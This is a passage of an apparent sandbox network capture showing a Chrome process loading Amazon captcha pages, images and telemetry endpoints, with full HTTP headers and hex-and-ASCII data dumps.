                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:36 UTC16384OUTData Raw: 7b 22 72 69 64 22 3a 22 38 58 38 43 30 36 4a 4b 58 57 59 36 59 4d 45 42 46 47 57 31 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 62 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 32 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 35 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 72 64 66 22 2c 22 76 22 3a 7b 22 61 65 6c 22 3a 31 2c 22 61 74 6f 62 22 3a 31 2c 22 63 6a 73 22 3a 30 2c 22 63 72 6d 22 3a 30 2c 22 64 63 6d 22 3a 31 2c 22 66 6c 73 22 3a 30 2c 22
                                                                                                                                  Data Ascii: {"rid":"8X8C06JKXWY6YMEBFGW1","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"csmcount":{"counter":"baselineCounter2","value":1,"t":5}},{"opfcsm-i":{"k":"rdf","v":{"ael":1,"atob":1,"cjs":0,"crm":0,"dcm":1,"fls":0,"
                                                                                                                                  2025-01-27 14:45:36 UTC6254OUTData Raw: 36 2c 22 73 22 3a 31 32 30 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 30 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 35 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 36 2c 22 73 22 3a 31 32 31 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 63 6f 6d 6d 65 6e 74 22 2c 22 69 64 22 3a 31 32 31 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 31 32 30 2c 22 74 78 74 22 3a 22 5c 6e 43 6f 72 72 65 69 6f 73 2e 44 6f 4e 6f 74 53 65 6e 64 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 36 2c 22 73 22 3a 31 32 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 32 2c 22 70 69 64 22 3a 31 2c
                                                                                                                                  Data Ascii: 6,"s":120,"k":"snpm","n":"#text","id":120,"pid":1,"sid":5,"txt":"\n\n"}},{"opfcsm-i":{"t":16,"s":121,"k":"snpm","n":"#comment","id":121,"pid":1,"sid":120,"txt":"\nCorreios.DoNotSend\n"}},{"opfcsm-i":{"t":16,"s":122,"k":"snpm","n":"#text","id":122,"pid":1,
                                                                                                                                  2025-01-27 14:45:37 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:37 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 974e069b-42f0-4966-82f0-20d593bf477b
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  50192.168.2.54997299.86.8.424433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:43 UTC905OUTGET /errors/validateCaptcha?amzn=tsPwu3l9tzgnem5k5fj8Zw%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  Referer: https://www.amazon.com/errors/validateCaptcha?amzn=V%2FQWGh%2Bxq8nH6gH01OjA4w%3D%3D&amzn-r=%2F&field-keywords=
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: csm-sid=837-4096594-8717172
                                                                                                                                  2025-01-27 14:45:44 UTC552INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:44 GMT
                                                                                                                                  x-amz-rid: JV24GEVQ6WQTM84SCTM8
                                                                                                                                  Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                  Via: 1.1 35c75b7f0ca8c787d67c8ebd22bc7fc2.cloudfront.net (CloudFront)
                                                                                                                                  X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  X-Amz-Cf-Id: 3riIiHZDK4Vs1LgY_BnnJhzCcRiOX7NVnML2DaDOz8ymJsCpNQFhAQ==
                                                                                                                                  2025-01-27 14:45:44 UTC6599INData Raw: 31 39 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 20 61 2d 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d
                                                                                                                                  Data Ascii: 19bf<!DOCTYPE html>...[if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->...[if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->...[if IE 8]> <html lang="en-us" class="a-no-js a-
                                                                                                                                  2025-01-27 14:45:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  51192.168.2.55003018.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:44 UTC623OUTGET /1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:44 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:44 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 35fdc952-f21d-48c3-b6dc-6642a55d4f75
                                                                                                                                  2025-01-27 14:45:44 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  52192.168.2.550032108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:44 UTC628OUTGET /captcha/rhnrlggh/Captcha_fcrspsdsms.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:45 UTC902INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5793
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 750ed8b4-12ed-4695-9156-5bb97a3b4832
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:16:35 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-896,/captcha/rhnrlggh/Captcha_fcrspsdsms
                                                                                                                                  Surrogate-Key: x-cache-896 /captcha/rhnrlggh/Captcha_fcrspsdsms
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 08:45:21 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 85310f8b6878a9cfaa0218e021ae364e.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 23895
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: X-TubXNIwMcQmXH0dWd8GKWQaEHEd2M2OlixsQAtX8PD89t7qIJ5XA==
                                                                                                                                  2025-01-27 14:45:45 UTC5793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1d 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 09 0a 08 0b 03 06 07 04 05 ff c4 00 2e 10 00 01 04 02 03 00 02 02 01 04 02 01 05 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 13 11 12 14 15 16 21 22 17 31 24 18 23 32 41 42 ff da 00 08 01 01 00 00 3f 00 bf c7 1c 73 83 05 0d 92 72 1e 08 63 25 a5 9c 10 a1 70 f3 79 25 23 e5 7f 5e 1f cb 1f b7 db 86 72 bf f4 c3 b9 4f e9 95 ff 00 ae 15 f9 ff 00 1c e7 e3 9d 72 c5 70 aa d4 31 0b fd d3 62 85 af 7f 72
                                                                                                                                  Data Ascii: JFIFHHCF.!"1$#2AB?src%py%#^rOrp1br


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  53192.168.2.55003518.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:44 UTC621OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 4137
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:44 UTC4137OUTData Raw: 7b 22 72 69 64 22 3a 22 38 58 38 43 30 36 4a 4b 58 57 59 36 59 4d 45 42 46 47 57 31 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 77 22 3a 31 32 38 30 2c 22 68 22 3a 37 30 37 2c 22 74 22 3a 31 30 37 38 2c 22 6b 22 3a 22 64 6f 69 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 32 34 37 2c 22 73 22 3a 31 37 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 44 49 56 22 2c 22 69 64 22 3a 31 36 31 2c 22 61 74 74 72 22 3a 7b 22 73 74 79 6c 65 22 3a 22 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                                  Data Ascii: {"rid":"8X8C06JKXWY6YMEBFGW1","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"opfcsm-i":{"w":1280,"h":707,"t":1078,"k":"doi"}},{"opfcsm-i":{"t":1247,"s":172,"k":"snpm","n":"DIV","id":161,"attr":{"style":"position:
                                                                                                                                  2025-01-27 14:45:45 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:45 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 97d6f693-2bed-4a7f-8032-a707f56c13e4
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  54192.168.2.55003954.88.216.1254433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:45 UTC390OUTGET /1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:45 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:45 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 06aec35d-a558-49ec-9162-985059d0be6f
                                                                                                                                  2025-01-27 14:45:45 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  55192.168.2.55004218.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:45 UTC394OUTGET /captcha/rhnrlggh/Captcha_fcrspsdsms.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:46 UTC1018INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5793
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 750ed8b4-12ed-4695-9156-5bb97a3b4832
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:16:35 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-896,/captcha/rhnrlggh/Captcha_fcrspsdsms
                                                                                                                                  Surrogate-Key: x-cache-896 /captcha/rhnrlggh/Captcha_fcrspsdsms
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 08:45:21 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 6b25d4ce9efa3f2699980e1915129606.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 23896
                                                                                                                                  Server-Timing: cdn-cache-hit,cdn-pop;desc="FRA60-P4",cdn-rid;desc="APl7atO1CyAGsu-LQBHxxqx7Ji0hPxAusrongrseC4p_ldxTA4oc3w==",cdn-hit-layer;desc="EDGE",cdn-downstream-fbl;dur=3,provider;desc="cf"
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: APl7atO1CyAGsu-LQBHxxqx7Ji0hPxAusrongrseC4p_ldxTA4oc3w==
                                                                                                                                  2025-01-27 14:45:46 UTC5793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1d 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 09 0a 08 0b 03 06 07 04 05 ff c4 00 2e 10 00 01 04 02 03 00 02 02 01 04 02 01 05 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 13 11 12 14 15 16 21 22 17 31 24 18 23 32 41 42 ff da 00 08 01 01 00 00 3f 00 bf c7 1c 73 83 05 0d 92 72 1e 08 63 25 a5 9c 10 a1 70 f3 79 25 23 e5 7f 5e 1f cb 1f b7 db 86 72 bf f4 c3 b9 4f e9 95 ff 00 ae 15 f9 ff 00 1c e7 e3 9d 72 c5 70 aa d4 31 0b fd d3 62 85 af 7f 72
                                                                                                                                  Data Ascii: JFIFHHCF.!"1$#2AB?src%py%#^rOrp1br


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  56192.168.2.55004418.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:45 UTC622OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 22638
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:45 UTC16384OUTData Raw: 7b 22 72 69 64 22 3a 22 4a 56 32 34 47 45 56 51 36 57 51 54 4d 38 34 53 43 54 4d 38 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 62 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 32 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 32 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 72 64 66 22 2c 22 76 22 3a 7b 22 61 65 6c 22 3a 31 2c 22 61 74 6f 62 22 3a 31 2c 22 63 6a 73 22 3a 30 2c 22 63 72 6d 22 3a 30 2c 22 64 63 6d 22 3a 31 2c 22 66 6c 73 22 3a 30 2c 22
                                                                                                                                  Data Ascii: {"rid":"JV24GEVQ6WQTM84SCTM8","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"csmcount":{"counter":"baselineCounter2","value":1,"t":2}},{"opfcsm-i":{"k":"rdf","v":{"ael":1,"atob":1,"cjs":0,"crm":0,"dcm":1,"fls":0,"
                                                                                                                                  2025-01-27 14:45:45 UTC6254OUTData Raw: 35 2c 22 73 22 3a 31 32 30 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 30 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 35 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 35 35 2c 22 73 22 3a 31 32 31 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 63 6f 6d 6d 65 6e 74 22 2c 22 69 64 22 3a 31 32 31 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 31 32 30 2c 22 74 78 74 22 3a 22 5c 6e 43 6f 72 72 65 69 6f 73 2e 44 6f 4e 6f 74 53 65 6e 64 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 35 35 2c 22 73 22 3a 31 32 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 32 2c 22 70 69 64 22 3a 31 2c
                                                                                                                                  Data Ascii: 5,"s":120,"k":"snpm","n":"#text","id":120,"pid":1,"sid":5,"txt":"\n\n"}},{"opfcsm-i":{"t":55,"s":121,"k":"snpm","n":"#comment","id":121,"pid":1,"sid":120,"txt":"\nCorreios.DoNotSend\n"}},{"opfcsm-i":{"t":55,"s":122,"k":"snpm","n":"#text","id":122,"pid":1,
                                                                                                                                  2025-01-27 14:45:46 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:46 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 2ed1ef32-ef34-47a2-a92b-28312f7d3434
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  57192.168.2.55003199.86.8.424433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:52 UTC905OUTGET /errors/validateCaptcha?amzn=UOEyeih%2FO2Ng4k18wziu%2Bg%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
